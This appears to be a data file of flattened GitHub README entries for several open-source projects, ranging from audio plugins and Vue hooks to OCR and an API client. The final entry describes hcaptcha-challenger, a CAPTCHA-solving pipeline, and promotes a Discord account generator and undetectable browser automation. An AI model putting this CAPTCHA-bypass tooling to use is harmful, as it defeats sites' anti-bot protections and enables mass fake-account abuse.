Spectral Compressor can squash anything into pink noise, apply simultaneous upwards and downwards compression to dynamically match the sidechain signal's spectrum and morph one sound into another, and lots more. Have you ever wondered what a 16384 band OTT would sound like? Neither have I. Framework Current features Supports both VST3 and CLAP by simply adding the corresponding nih_export_<api>!(Foo) macro to your plugin's library. Standalone binaries can be made by calling nih_export_standalone(Foo) from your main() function. Standalones come with a CLI for configuration and full JACK audio, MIDI, and transport support. Rich declarative parameter system without any boilerplate. Define parameters for your plugin by adding FloatParam , IntParam , BoolParam , and EnumParam<T> fields to your parameter struct, assign stable IDs to them with the #[id = "foobar"] attribute, and a #[derive(Params)] does all of the boring work for you. Parameters can have complex value distributions and the parameter objects come with built-in smoothers and callbacks. Use simple enums deriving the Enum trait with the EnumParam<T> parameter type for parameters that allow the user to choose between multiple discrete options. That way you can use regular Rust pattern matching when working with these values without having to do any conversions yourself. Store additional non-parameter state for your plugin by adding any field that can be serialized with Serde to your plugin's Params object and annotating them with #[persist = "key"] . Optional support for state migrations, for handling breaking changes in plugin parameters. Group your parameters into logical groups by nesting Params objects using the #[nested(group = "...")] attribute. The #[nested] attribute also enables you to use multiple copies of the same parameter, either as regular object fields or through arrays. When needed, you can also provide your own implementation for the Params trait to enable compile-time generated parameters and other bespoke functionality. Stateful. Behaves mostly like JUCE, just without all of the boilerplate. Comes with a simple yet powerful way to asynchronously run background tasks from a plugin that's both type-safe and realtime-safe. Does not make any assumptions about how you want to process audio, but does come with utilities and adapters to help with common access patterns. Efficiently iterate over an audio buffer either per-sample per-channel, per-block per-channel, or even per-block per-sample-per-channel with the option to manually index the buffer or get access to a channel slice at any time. Easily leverage per-channel SIMD using the SIMD adapters on the buffer and block iterators. Comes with bring-your-own-FFT adapters for common (inverse) short-time Fourier Transform operations. More to come. Optional sample-accurate automation support for VST3 and CLAP that can be enabled by setting the Plugin::SAMPLE_ACCURATE_AUTOMATION constant to true . Optional support for compressing the human-readable JSON state files using Zstandard . Comes with adapters for popular Rust GUI frameworks as well as some basic widgets for them that integrate with NIH-plug's parameter system. Currently there's support for egui , iced and VIZIA . A simple and safe API for state saving and restoring from the editor is provided by the framework if you want to do your own internal preset management. Full support for receiving and outputting both modern polyphonic note expression events as well as MIDI CCs, channel pressure, and pitch bend for CLAP and VST3. 
MIDI SysEx is also supported. Plugins can define their own structs or sum types to wrap around those messages so they don't need to interact with raw byte buffers in the process function. Support for flexible dynamic buffer configurations, including variable numbers of input and output ports. First-class support for several more exotic CLAP features: Both monophonic and polyphonic parameter modulation are supported. Plugins can declaratively define pages of remote controls that DAWs can bind to hardware controllers. A plugin bundler accessible through the cargo xtask bundle <package> <build_arguments> command that automatically detects which plugin targets your plugin exposes and creates the correct plugin bundles for your target operating system and architecture, with cross-compilation support. The cargo subcommand can easily be added to your own project as an alias or globally as a regular cargo subcommand. Tested on Linux and Windows, with limited testing on macOS. Windows support has mostly been tested through Wine with yabridge . See the Plugin trait's documentation for an incomplete list of the functionality that has currently not yet been implemented. Building NIH-plug works with the latest stable Rust compiler. After installing Rust , you can compile any of the plugins in the plugins directory in the following way, replacing gain with the name of the plugin: shell cargo xtask bundle gain --release Plugin formats NIH-plug can currently export VST3 and CLAP plugins. Exporting a specific plugin format for a plugin is as simple as calling the nih_export_<format>!(Foo); macro. The cargo xtask bundle command will detect which plugin formats your plugin supports and create the appropriate bundles accordingly, even when cross-compiling. Example plugins The best way to get an idea of what the API looks like is to look at the examples. gain is a simple smoothed gain plugin that shows off a couple of other parts of the API, like support for storing arbitrary serializable state. gain-gui is the same plugin as gain, but with a GUI to control the parameter and a digital peak meter. Comes in three exciting flavors: egui , iced , and VIZIA . midi_inverter takes note/MIDI events and flips around the note, channel, expression, pressure, and CC values. This example demonstrates how to receive and output those events. poly_mod_synth is a simple polyphonic synthesizer with support for polyphonic modulation in supported CLAP hosts. This demonstrates how polyphonic modulation can be used in NIH-plug. sine is a simple test tone generator plugin with frequency smoothing that can also make use of MIDI input instead of generating a static signal based on the plugin's parameters. stft shows off some of NIH-plug's other optional higher-level helper features, such as an adapter to process audio with a short-time Fourier transform using the overlap-add method, all using the compositional Buffer interfaces. sysex is a simple example of how to send and receive SysEx messages by defining custom message types. Licensing The framework, its libraries, and the example plugins in plugins/examples/ are all licensed under the ISC license . However, the VST3 bindings used by nih_export_vst3!() are licensed under the GPLv3 license. This means that unless you replace these bindings with your own bindings made from scratch, any VST3 plugins built with NIH-plug need to be able to comply with the terms of the GPLv3 license. The other plugins in the plugins/ directory may be licensed under the GPLv3 license. 
Check the plugin's Cargo.toml file for more information.;Rust VST3 and CLAP plugin framework and plugins - because everything is better when you do it yourself;vst3,framework,plugin-framework,plugin,rust,clap,nih-plug
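To give a feel for the declarative parameter system described in the feature list above, here is a minimal sketch of a parameter struct. It uses the names mentioned there (FloatParam, #[id = "..."], #[derive(Params)]); treat the exact builder methods and range values as assumptions that may differ between versions of the framework:

```rust
use nih_plug::prelude::*;

// A single gain parameter with a stable ID; the derive macro generates the
// boring plumbing (host exposure, state saving) automatically.
#[derive(Params)]
struct GainParams {
    #[id = "gain"]
    pub gain: FloatParam,
}

impl Default for GainParams {
    fn default() -> Self {
        Self {
            gain: FloatParam::new(
                "Gain",
                0.0, // default value, in dB here
                FloatRange::Linear { min: -30.0, max: 30.0 },
            )
            .with_unit(" dB")
            // Built-in smoother, as mentioned in the feature list above.
            .with_smoother(SmoothingStyle::Linear(50.0)),
        }
    }
}
```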
robbert-vdh/nih-plug
InhiblabCore/vue-hooks-plus;# VueHooks Plus English | [简体中文](https://github.com/InhiblabCore/vue-hooks-plus/tree/master/README.zh-CN.md) High-performance & simple Vue 3 Hooks library ✨ Features 🏄🏼‍♂️ Easy to learn and use 🔋 Supports SSR 🛸 Contains a comprehensive collection of basic Hooks 🏟️ A wide range of application scenarios 🦾 Preferred useRequest, a powerful request middle layer 🎪 Interactive, immersive demos 🎯 Written in TypeScript with predictable static types 🪄 Supports on-demand loading to reduce bundle size 🤺 Playground, with ample scope for experimentation 🔐 Thoroughly tested, safe and reliable 📦 Install bash npm i vue-hooks-plus CDN ```html ``` It will be exposed globally as VueHooks_Plus 🤹‍♀️ Usage typescript import { useRequest } from 'vue-hooks-plus' On-demand import typescript import useRequest from 'vue-hooks-plus/es/useRequest' Auto Import Vite ```ts import AutoImport from 'unplugin-auto-import/vite' import { VueHooksPlusResolver } from '@vue-hooks-plus/resolvers' export const AutoImportDeps = () => AutoImport({ imports: ['vue', 'vue-router'], include: [/\.[tj]sx?$/, /\.vue$/, /\.vue\?vue/, /\.md$/], dts: 'src/auto-imports.d.ts', resolvers: [VueHooksPlusResolver()], }) ``` Webpack ```ts const { VueHooksPlusResolver } = require('@vue-hooks-plus/resolvers') module.exports = { /* ... */ plugins: [ require('unplugin-auto-import/webpack')({ imports: ['vue', 'vue-router'], include: [/\.[tj]sx?$/, /\.vue$/, /\.vue\?vue/, /\.md$/], dts: 'src/auto-imports.d.ts', resolvers: [VueHooksPlusResolver()], }), ], } ``` For other supported tools, please see unplugin-auto-import Globalization Documentations English Documentations 中文文档 Example Vue Admin Novel Nuxt 3 Vite + Vue 3 Webpack + Vue 3 🤩 Awesome Template Ray Template 🪴 Project Activity Contributing Welcome to join us! You can check out the Contributing Guide to learn how to get started. Contributors Thanks to everyone for their contributions 🐝 ! 🌸 Thanks This project is heavily inspired by the following awesome projects. ahooks @koale/useworker 📄 License MIT License © 2022-PRESENT YongGit
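As a taste of the useRequest hook highlighted above, here is a minimal sketch (getUsername is a hypothetical service standing in for a real API call; any function returning a Promise should work):

```typescript
import { useRequest } from 'vue-hooks-plus'

// Hypothetical async service.
function getUsername(): Promise<string> {
  return new Promise(resolve => setTimeout(() => resolve('mona'), 1000))
}

// data, loading and error are reactive refs that can be used
// directly in a component's template.
const { data, loading, error } = useRequest(getUsername)
```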
InhiblabCore/vue-hooks-plus
anthropics/hh-rlhf;Overview This repository provides access to: 1. Human preference data about helpfulness and harmlessness from Training a Helpful and Harmless Assistant with Reinforcement Learning from Human Feedback 2. Human-generated red teaming data from Red Teaming Language Models to Reduce Harms: Methods, Scaling Behaviors, and Lessons Learned . Each of these datasets is described further below. Disclaimer : The data contain content that may be offensive or upsetting. Topics include, but are not limited to, discriminatory language and discussions of abuse, violence, self-harm, exploitation, and other potentially upsetting subject matter. Please only engage with the data in accordance with your own personal risk tolerance. The data are intended for research purposes, especially research that can make models less harmful. The views expressed in the data do not reflect the views of Anthropic or any of its employees. Human preference data about helpfulness and harmlessness The data are described in the paper: Training a Helpful and Harmless Assistant with Reinforcement Learning from Human Feedback . If you find the data useful, please cite the paper. The data format is very simple -- each line of the jsonl files contains a pair of texts, one "chosen" and one "rejected". For helpfulness , the data are grouped into train/test splits in three tranches: from our base models (context-distilled 52B language models), via rejection sampling (mostly with best-of-16 sampling) against an early preference model, and a dataset sampled during our iterated "online" process. For harmlessness , the data are only collected for our base models, but otherwise formatted in the same way. Details about the data collection process and crowdworker population can be found in the paper, specifically in Section 2 and Appendix D. Red teaming data The data are described in the paper: Red Teaming Language Models to Reduce Harms: Methods, Scaling Behaviors, and Lessons Learned . If you find the data useful, please cite the paper. Details about the data and data collection procedures can be found in the Datasheet in the appendix of the paper. Each line of the jsonl file contains a dictionary with the following fields: - transcript: a text transcript of a conversation between a human adversary (red team member) and an AI assistant - min_harmlessness_score_transcript: a real-valued score of the harmlessness of the AI assistant (lower is more harmful) as obtained from a preference model - num_params: the number of parameters in the language model powering the AI assistant - model_type: the type of model powering the AI assistant - rating: the red team member's rating of how successful they were at breaking the AI assistant (Likert scale, higher is more successful) - task_description: a short text description written by the red team member about how they tried to red team the AI assistant - task_description_harmlessness_score: a real-valued score of the harmlessness of the task description (lower is more harmful) as obtained from a preference model - red_team_member_id: an arbitrary identifier of the red team member; one red team member can generate multiple red team attacks - is_upworker: a binary indicator that is true if the red team member was from the crowd platform Upwork or false if they were from MTurk - tags: a list of up to 6 tags per transcript; tags are short descriptions of the red team attempts generated by crowdworkers who reviewed red team data post-hoc. 
tags were only provided for a random sample of 1000 red team attempts for two of four model types. Contact You can submit inquiries to: redteam@anthropic.com;Human preference data for "Training a Helpful and Harmless Assistant with Reinforcement Learning from Human Feedback";[]
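For reference, here is a minimal sketch of reading the preference data described above (the path is hypothetical; point it at a decompressed jsonl split from this repository):

```python
import json

# Hypothetical local path to one of the decompressed helpfulness splits.
path = "helpful-base/train.jsonl"

with open(path) as f:
    for line in f:
        pair = json.loads(line)  # {"chosen": "...", "rejected": "..."}
        chosen, rejected = pair["chosen"], pair["rejected"]
        # ... feed the preference pair into your training or analysis code ...
        break  # only inspect the first pair in this sketch
```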
anthropics/hh-rlhf
zh-lx/code-inspector;packages/code-inspector-plugin/README.md;Click a DOM element on the page and it will open your IDE and position the cursor at the element's source code location.;vue,vscode,webpack-plugin,code,devtools,inspector,react,vite-plugin
zh-lx/code-inspector
kha-white/manga-ocr;Manga OCR Optical character recognition for Japanese text, with the main focus being Japanese manga. It uses a custom end-to-end model built with Transformers' Vision Encoder Decoder framework. Manga OCR can be used as a general-purpose printed Japanese OCR, but its main goal was to provide high-quality text recognition that is robust against various scenarios specific to manga: - both vertical and horizontal text - text with furigana - text overlaid on images - a wide variety of fonts and font styles - low quality images Unlike many OCR models, Manga OCR supports recognizing multi-line text in a single forward pass, so that text bubbles found in manga can be processed at once, without splitting them into lines. See also: - Poricom , a GUI reader, which uses manga-ocr - mokuro , a tool which uses manga-ocr to generate an HTML overlay for manga - Xelieu's guide , a comprehensive guide on setting up a reading and mining workflow with manga-ocr/mokuro (and many other useful tips) - Development code, including code for training and synthetic data generation: link - Description of the synthetic data generation pipeline + examples of generated images: link Installation You need Python 3.6 or newer. Please note that the newest Python release might not be supported due to a PyTorch dependency, which often breaks with new Python releases and needs some time to catch up. Refer to the PyTorch website for a list of supported Python versions. Some users have reported problems with Python installed from the Microsoft Store. If you see an error: ImportError: DLL load failed while importing fugashi: The specified module could not be found. , try installing Python from the official site . If you want to run with a GPU, install PyTorch as described here , otherwise this step can be skipped. Troubleshooting ImportError: DLL load failed while importing fugashi: The specified module could not be found. - might be caused by Python installed from the Microsoft Store; try installing Python from the official site problems with installing mecab-python3 on ARM architecture - try this workaround Usage Python API ```python from manga_ocr import MangaOcr mocr = MangaOcr() text = mocr('/path/to/img') ``` or ```python import PIL.Image from manga_ocr import MangaOcr mocr = MangaOcr() img = PIL.Image.open('/path/to/img') text = mocr(img) ``` Running in the background Manga OCR can run in the background and process new images as they appear. You might use a tool like ShareX or Flameshot to manually capture a region of the screen and let the OCR read it either from the system clipboard or a specified directory. By default, Manga OCR will write recognized text to the clipboard, from which it can be read by a dictionary like Yomichan . Clipboard mode on Linux requires wl-copy for Wayland sessions or xclip for X11 sessions. You can find out which one your system needs by running echo $XDG_SESSION_TYPE in the terminal. 
Your full setup for reading manga in Japanese with a dictionary might look like this: capture region with ShareX -> write image to clipboard -> Manga OCR -> write text to clipboard -> Yomichan https://user-images.githubusercontent.com/22717958/150238361-052b95d1-0152-485f-a441-48a957536239.mp4 To read images from the clipboard and write recognized text to the clipboard, run in the command line: commandline manga_ocr To read images from ShareX's screenshot folder, run in the command line: commandline manga_ocr "/path/to/sharex/screenshot/folder" Note that when running in the clipboard scanning mode, any image that you copy to the clipboard will be processed by OCR and replaced by the recognized text. If you want to be able to copy and paste images as usual, you should use the folder scanning mode instead and define a separate task in ShareX just for OCR, which saves screenshots to some folder without copying them to the clipboard. When running for the first time, downloading the model (~400 MB) might take a few minutes. The OCR is ready to use after the OCR ready message appears in the logs. To see other options, run in the command line: commandline manga_ocr --help If manga_ocr doesn't work, you might also try replacing it with python -m manga_ocr . Usage tips OCR supports multi-line text, but the longer the text, the more likely some errors are to occur. If the recognition fails for some part of a longer text, you might try to run it on a smaller portion of the image. The model was trained specifically to handle manga well, but it should do a decent job on other types of printed text, such as novels or video games. It probably won't be able to handle handwritten text though. The model always attempts to recognize some text on the image, even if there is none. Because it uses a transformer decoder (and therefore has some understanding of the Japanese language), it might even "dream up" some realistic-looking sentences! This shouldn't be a problem for most use cases, but it might get improved in the next version. Examples Here are some cherry-picked examples showing the capability of the model. | image | Manga OCR result | |----------------------|------------------| | | 素直にあやまるしか | | | 立川で見た〝穴〟の下の巨大な眼は: | | | 実戦剣術も一流です | | | 第30話重苦しい闇の奥で静かに呼吸づきながら | | | よかったじゃないわよ!何逃げてるのよ!!早くあいつを退治してよ! | | | ぎゃっ | | | ピンポーーン | | | LINK!私達7人の力でガノンの塔の結界をやぶります | | | ファイアパンチ | | | 少し黙っている | | | わかるかな〜? | | | 警察にも先生にも町中の人達に!! | Contact For any inquiries, please feel free to contact me at kha-white@mail.com Acknowledgments This project was made with the use of: - Manga109-s dataset - CC-100 dataset;Optical character recognition for Japanese text, with the main focus being Japanese manga;ocr,japanese,manga,transformers,computer-vision,deep-learning,comics
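The built-in folder scanning mode described above already handles this for you, but as a sketch of what it looks like with the documented Python API (the screenshots directory is a hypothetical stand-in for e.g. your ShareX folder):

```python
import time
from pathlib import Path

from manga_ocr import MangaOcr

watch_dir = Path("screenshots")  # hypothetical folder to watch

mocr = MangaOcr()  # downloads the model (~400 MB) on first run
seen = set(watch_dir.glob("*.png"))

# Poll the folder and OCR any newly appearing screenshot.
while True:
    for img in sorted(watch_dir.glob("*.png")):
        if img not in seen:
            seen.add(img)
            print(img.name, "->", mocr(str(img)))
    time.sleep(1)
```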
kha-white/manga-ocr
EsperoTech/yaade;Yaade - Yet Another API Development Environment Yaade is an open-source, self-hosted, collaborative API development environment. 📚 Documentation Visit docs.yaade.io . 🤔 Why did you develop Yaade? I was looking for a self-hosted Postman alternative so that API collections can easily be shared between teammates. Even though popular solutions like Hoppscotch exist, their self-hosted app does not come with authentication and relies on Firebase for persistence. Yaade is developed from the ground up with self-hosting and security in mind. That means sensitive information in API requests can safely be stored on your own server! 🌟 Features Self-hosted: data never leaves your own server Multi-user: manage users and their permissions Persistent: even across container or server restarts Easy single-file data import / export Requests are executed on your machine so you can call localhost as well as remote servers Collection and request descriptions (documentation) with Markdown Request/Response scripts (for both collections and requests) Most importantly: dark mode by default ⚡ Install To have the best experience with Yaade, run the docker container on your server and install the browser extension on your local machine. 1. 🐋 Docker bash docker volume create yaade docker run -d --restart=always -p 9339:9339 -e YAADE_ADMIN_USERNAME=admin -v yaade:/app/data --name yaade esperotech/yaade:latest The default password is password . After logging in, go to ⚙️ > Account and change the password. 2. 🔧 Extension Yaade uses a browser extension as a proxy to enable CORS requests. Install the extension using your browser's extension store. Currently only a Chrome extension is available. You can find it here . Then open it and input your server URL, e.g. https://yaade.example.com/ . From that point on, all requests originating from your Yaade browser tabs will be proxied through the extension. ⬆️ Upgrade To upgrade the docker container to a new version, first stop the running container, pull the latest version and start a new container with the old volume. bash docker rm -f yaade docker pull esperotech/yaade:latest docker run -d --restart=always -p 9339:9339 -e YAADE_ADMIN_USERNAME=admin -v yaade:/app/data --name yaade esperotech/yaade:latest 💾 Technology SPA built with TypeScript, React and Vite. Backend built with Kotlin. H2 file-based database. Browser extension with plain JavaScript. 🖥️ Local development Install the required dependencies Java 11 Kotlin Node >= 16 Clone the repository Install the project-specific dependencies bash cd scripts/ chmod +x install.sh ./install.sh Start the server on port 9339 using your IDE of choice (I use IntelliJ IDEA); you can also run it using the jar file directly: $ java -jar server/build/libs/yaade-server-1.0-SNAPSHOT Note that you must set the environment variable YAADE_ADMIN_USERNAME for it to run Start the Vite dev server on port 9338 bash cd client/ npm run dev Start the dev-proxy on port 9337 bash cd dev-proxy/ node index.js Now open your browser and visit http://localhost:9337 🔨 Build bash cd scripts/ chmod +x build.sh ./build.sh Screenshots 🌙 Dark mode ☀️ Light mode More Screenshots 🤝 How can I contribute? Your contribution is very welcome! First open an issue about the topic you want to contribute to, e.g. adding a new feature, a bugfix or refactoring. We will then discuss further details. 
Eventually, I will review your Pull Request and merge / release it.;Yaade is an open-source, self-hosted, collaborative API development environment.;selfhosted,docker,kotlin,typescript,h2-database,api,postman,hoppscotch
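If you prefer Compose over a plain docker run, here is a sketch of a docker-compose.yml equivalent to the install command above (same image, port, admin user, and data volume; the file itself is not part of the repository):

```yaml
services:
  yaade:
    image: esperotech/yaade:latest
    restart: always
    ports:
      - "9339:9339"
    environment:
      - YAADE_ADMIN_USERNAME=admin
    volumes:
      - yaade:/app/data

volumes:
  yaade:
```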
EsperoTech/yaade
joschuck/matrix-webcam;matrix-webcam This package displays your webcam video feed in the console. Take your next video conference from within the matrix! Running it Make sure you have Python and pip installed. Installation using pip: $ pip install matrix-webcam # make sure it's in your PATH for it to run, alternatively use sudo $ matrix-webcam Installing and running it from source: $ git clone https://github.com/joschuck/matrix-webcam.git $ cd matrix-webcam $ python -m pip install . $ matrix-webcam Tip: Shrink your font size; it will look even more hacky usage: matrix-webcam [-h] [-l LETTERS] [-p PROBABILITY] [-u UPDATES_PER_SECOND] options: -h, --help show this help message and exit -d DEVICE, --device DEVICE Sets the index of the webcam if you have more than one webcam. -l LETTERS, --letters LETTERS The number of letters produced per update. -p PROBABILITY, --probability PROBABILITY 1/p probability of a dispense point deactivating each tick. -u UPDATES_PER_SECOND, --updates-per-second UPDATES_PER_SECOND The number of updates to perform per second. Can I use this for Teams/Zoom/Skype etc.? For Windows/Mac Users Yes! You can for example use OBS Studio ~~ together with the Virtual Cam plugin ~~ . Notice: OBS Studio has officially provided a virtual camera feature since version 26.0.0, so you can use it without installing this plugin. Then all you need to do is select the virtual webcam in Teams/Zoom/Skype. For Linux Users First we need to make sure you have the v4l2loopback kernel module set up to create V4L2 loopback devices. This module allows you to create "virtual video devices". Normal (v4l2) applications will read these devices as if they were ordinary video devices, but the video will not be read from, e.g., a capture card; instead it is generated by another application. It should be available in your distro's package manager. Under Ubuntu, install it using: $ sudo apt install -y v4l2loopback-dkms v4l2loopback-utils Now we need to create a virtual v4l2 device (exclusive_caps=1 and YUV2 conversion is required by Chromium for the device to be recognized): $ sudo modprobe v4l2loopback devices=1 video_nr=42 card_label="Virtual Camera" exclusive_caps=1 max_buffers=2 Now we need to find the xid of the terminal window we will launch matrix-webcam in, using $ xdotool getactivewindow 79869947 # sample output Optionally resize the terminal window to something reasonable from another terminal and then launch matrix-webcam $ wmctrl -i -r 79869947 -e 0,300,300,1280,720 # in another terminal (2) Now launch matrix-webcam $ matrix-webcam # in the terminal that was just resized Now launch the virtual device in terminal (2) - you need GStreamer for this; check the link on how to install it $ gst-launch-1.0 ximagesrc xid=79869947 ! video/x-raw,framerate=30/1 ! videoconvert ! video/x-raw,format=YUY2 ! v4l2sink device=/dev/video42 That's it, your webcam should show up in Chromium, Teams, etc.! Development I'd recommend creating a new virtual environment (under Ubuntu, install venv support using sudo apt install python3-venv) using $ python3 -m venv venv/ $ source venv/bin/activate Then install the dependencies using: $ pip install -e .[dev,deploy] Set up pre-commit, too: $ pre-commit install TODO [x] Add virtual webcam documentation for Linux/GStreamer [x] add webcam selection [ ] Move to opencv-python-headless [ ] add tests License This project is licensed under the MIT License (see the LICENSE file for details).;Take your video conference from within the matrix.;[]
joschuck/matrix-webcam
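To make the core idea above concrete (webcam frames rendered as characters in the terminal), here is a minimal sketch using opencv-python. The brightness-to-character ramp, the 80×24 target size, and all names are illustrative assumptions, not matrix-webcam's actual implementation.

```python
# Minimal sketch (not matrix-webcam's actual code): read webcam frames with
# OpenCV and print them as ASCII characters, darkest to brightest.
import cv2  # pip install opencv-python

CHARS = " .:-=+*#%@"  # illustrative brightness ramp

cap = cv2.VideoCapture(0)  # device index 0; matrix-webcam exposes this via -d
try:
    while True:
        ok, frame = cap.read()
        if not ok:
            break
        gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
        small = cv2.resize(gray, (80, 24))  # fit a typical terminal
        lines = [
            "".join(CHARS[int(pixel) * (len(CHARS) - 1) // 255] for pixel in row)
            for row in small
        ]
        print("\033[H" + "\n".join(lines))  # move cursor home, redraw in place
finally:
    cap.release()
```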
education/GitHubGraduation-2022;GitHub Graduation-2022 Available Translations 🗣 Arabic Armenian Bangla 中文 Español (España) Español (México) Filipino French German Hindi Indonesian Italian 日本語 Korean Malay Nepali Polski Portuguese (Brazil) मराठी (Marathi) Punjabi Русский Somali ไทย Türkçe Urdu Read the instructions in your language or contribute a translation ! Sep 05, 2022 Re-print of the GitHub Graduation card. We are aware that some of you have not received the card yet. We are opening a form for a reprint. We will keep it open until Sep 30. Please only fill out the form if you have not received your card. form May 30, 2022 And that’s a wrap on the GitHub 2022 Yearbook ✨✅ Submissions to the repository are closed as of 12:00pm PT. The Yearbook will be live on Wednesday, June 8. Check back here for updates! If you believe there has been a mistake with reviews, please let us know in an Issue . All Issues will be responded to before the event on June 11. Don’t forget to save the date and follow us on Twitch for notifications! See you on stage at graduation 👋 This repository contains the yearbook for GitHub Graduation 2022 . By issuing a pull request to this repository, you can request to be added to the GitHub Class of 2022. The first 7,500 pull requests successfully merged into the repository by May 27 will receive a custom trading card, stickers, and a letter in the mail. Privacy Notice 👀 Consider that all the information that you add to this repository will be publicly available. If you don't feel comfortable with displaying your full name, you can include a short name or nickname instead. Who can apply 📝 We invite any student who has graduated, or plans to graduate, in 2022 to apply to the yearbook. This includes bootcamps, code camps, high school graduates, Master's graduates, Ph.D. graduates, etc. The eligibility criteria are - You have been verified as a student with the GitHub Student Developer Pack. Not yet a part of the Pack? Apply here . You have not participated in a past GitHub Graduation event. You identify as a graduate in the year 2022. How to join the Class of 2022 Here are two steps to join graduation and receive your custom trading card and stickers in the mail. Fill out the shipping form ⚠️ The form needs to be completed before creating your Pull Request (PR) and does not guarantee participation in the event. Your PR must successfully merge into the repository, and only the first 7,500 merged PRs will receive cards in the mail. Submit a pull request with your profile information to join the Yearbook and be highlighted in the graduation event. 1. Fill out the shipping form. Information submitted to the swag shipment form is only used to ship trading cards for graduation. Submitting the form does not guarantee you will receive anything in the mail. Only the first 7,500 graduates to merge their Pull Request to the GitHub Yearbook will receive a shipment. 2. Add yourself to the Yearbook 🏫 Replace <YOUR-USERNAME> with your GitHub username in this guide. Please note that <YOUR-USERNAME> here is case-sensitive. For example, if your username is MonaTheOctocat , using anything else, like monatheoctocat or monaTheoctocat , will throw an error while submitting the Pull Request, so make sure you're using the exact same case as your username in both the folder name and file name. First, create the folder _data/YOUR-USERNAME/ Fork this repository, create a new folder inside the _data folder, and name it with your username. It should look something like this: _data/<YOUR-USERNAME>/ . Ex.
_data/MonaTheOctocat/ Second, add your profile information Create a markdown file in your folder following the convention <YOUR-USERNAME>.md . Ex. _data/MonaTheOctocat/MonaTheOctocat.md Copy the template below into your file, delete the boilerplate data, and fill in your own information. ``` name: FULLNAME-OR-NICKNAME # No longer than 28 characters institution: INSTITUTION-NAME 🚩 # no longer than 58 characters quote: YOUR-SENIOR-QUOTE # no longer than 100 characters, avoid using quotes (") to guarantee the format remains the same. github_user: YOUR-GITHUB-USERNAME ``` Do not use special characters in the template above. Third, submit your Pull Request Go through the checklist on the pull request template to guarantee your submission is valid. The GitHub Education team will review your application and approve and merge your submission if everything is correct. Otherwise, you will get notified of the changes requested in the pull request comment section. Having trouble submitting your Pull Request? Ask for help in the GitHub Community ! Graduation Stories 2022 👩‍🏫👨‍🏫 (optional) Looking for more ways to participate in GitHub Graduation and the possibility of being featured on our social account? We want to hear about the amazing things you achieved during your academic year and how GitHub helped you to accomplish your goals. Take a moment to record a video or write a message and share your story with us, your teachers, and your classmates. How to participate We are looking forward to hearing what you have to say, and we are grateful to have you as part of our community 💖 Remember: you have until May 30th to submit your story! A note on swag 🛍 The first 7,500 successfully merged PRs will receive a custom holographic developer trading card with their GitHub status in the mail. What does this mean? We will use your public GitHub profile information to create a trading card. To ensure your trading card best reflects you, please make sure your GitHub profile picture and bio are up to date and what you would like shown on the card. Graduation Day 🎓 Don't forget to watch the livestream! 📆 Saturday, June 11, 2022 ⏰ 9:00am PT | 16:00 GMT | 21:30 IST 📍 Follow the GitHub Education Twitch Channel for notifications. 📎 Add the event to your calendar: Google Calendar Outlook Calendar Yahoo Calendar Questions about GitHub Graduation? Ask in the GitHub Community Discussions .;Join the GitHub Graduation Yearbook and "walk the stage" on June 11.;[]
education/GitHubGraduation-2022
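The yearbook template above comes with hard limits (name ≤ 28 characters, institution ≤ 58, quote ≤ 100, no double quotes in the quote, case-sensitive username). A small hypothetical helper like the following, which is not part of the repository, could check an entry before the pull request is opened; the parsing is a simplification of the template format.

```python
# Hypothetical helper (not part of the repository): check a yearbook entry
# against the limits described above before opening a pull request.
from pathlib import Path

LIMITS = {"name": 28, "institution": 58, "quote": 100}

def check_entry(username: str, root: str = "_data") -> list[str]:
    problems = []
    md = Path(root) / username / f"{username}.md"  # folder and file are case-sensitive
    if not md.exists():
        return [f"missing file: {md}"]
    fields = {}
    for line in md.read_text(encoding="utf-8").splitlines():
        if ":" in line:
            key, _, value = line.partition(":")
            fields[key.strip()] = value.split("#")[0].strip()  # drop trailing comments
    for key, limit in LIMITS.items():
        if len(fields.get(key, "")) > limit:
            problems.append(f"{key} longer than {limit} characters")
    if '"' in fields.get("quote", ""):
        problems.append('quote contains a double quote (")')
    if fields.get("github_user") != username:
        problems.append("github_user does not match the folder name")
    return problems

print(check_entry("MonaTheOctocat") or "looks good")
```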
QIN2DIM/hcaptcha-challenger;hCaptcha Challenger 🚀 Gracefully face the hCaptcha challenge with an MoE (ONNX) embedded solution. Introduction Does not rely on any Tampermonkey script. Does not use any third-party anti-captcha services. Just implement some interfaces to make AI vs AI possible. Features | Challenge Type | Pluggable Resource | | --------------------------------------- | ------------------------------------------------------------ | | image_label_binary | ResNet ONNX classification #challenge | | image_label_area_select: point | YOLOv8 ONNX detection #588 | | image_label_area_select: bounding box | YOLOv8 ONNX segmentation #592 | | image_label_multiple_choice | ViT ONNX zero-shot motion #917 | | Advanced Task | Pluggable Resource | | --------------------------- | ------------------------------------------------------------ | | Rank.Strategy | #nested-model-zoo | | self-supervised challenge | #CLIP-ViT | Workflow | Tasks | Resource | | ----------------------------- | ------------------------------------------------------------ | | ci: sentinel | | | ci: collector | | | datasets: VCS, annotate | #roboflow , #model-factory | | model: ResNet - train / val | | | model: YOLOv8 - train / val | | | model: upload, upgrade | #objects , #modelhub | | datasets: public, archive | #roboflow-universe , #captcha-datasets | Contributors I would like to express my sincere gratitude to all the contributors. What's next Dislock , the most advanced Discord Browser Generator. Powered by hCaptcha Solving AI. undetected-playwright , stash the fingerprint of playwright-based web agents. epic-awesome-gamer , gracefully claim weekly free games from the Epic Store. Reference microsoft/playwright-python ultrafunkamsterdam/undetected-chromedriver hCaptcha challenge template site @maximedrn;🥂 Gracefully face hCaptcha challenge with MoE(ONNX) embedded solution.;yolov5,hcaptcha,opencv-python,onnx-models,hcaptcha-solver,solver,onnx,yolo,onnxruntime,playwright
QIN2DIM/hcaptcha-challenger
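To sketch what the image_label_binary row in the table above amounts to in practice, here is a hedged onnxruntime example of running a ResNet-style binary classifier over a challenge tile. The model file name, the 64×64 input size, the normalization, and the output layout are assumptions for illustration, not the project's actual pipeline.

```python
# Illustrative sketch only: classify a challenge tile with an ONNX model.
# "resnet_binary.onnx", the 64x64 input size, and the single-output layout
# are assumptions for the example, not hcaptcha-challenger's real settings.
import numpy as np
import onnxruntime as ort
from PIL import Image

session = ort.InferenceSession("resnet_binary.onnx")
input_name = session.get_inputs()[0].name

def is_match(image_path: str) -> bool:
    img = Image.open(image_path).convert("RGB").resize((64, 64))
    x = np.asarray(img, dtype=np.float32) / 255.0   # HWC in [0, 1]
    x = np.transpose(x, (2, 0, 1))[None, ...]       # NCHW batch of 1
    (logits,) = session.run(None, {input_name: x})  # assumes a single output
    return bool(np.argmax(logits, axis=-1)[0] == 1) # class 1 = "matches the label"

print(is_match("challenge_tile.png"))
```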
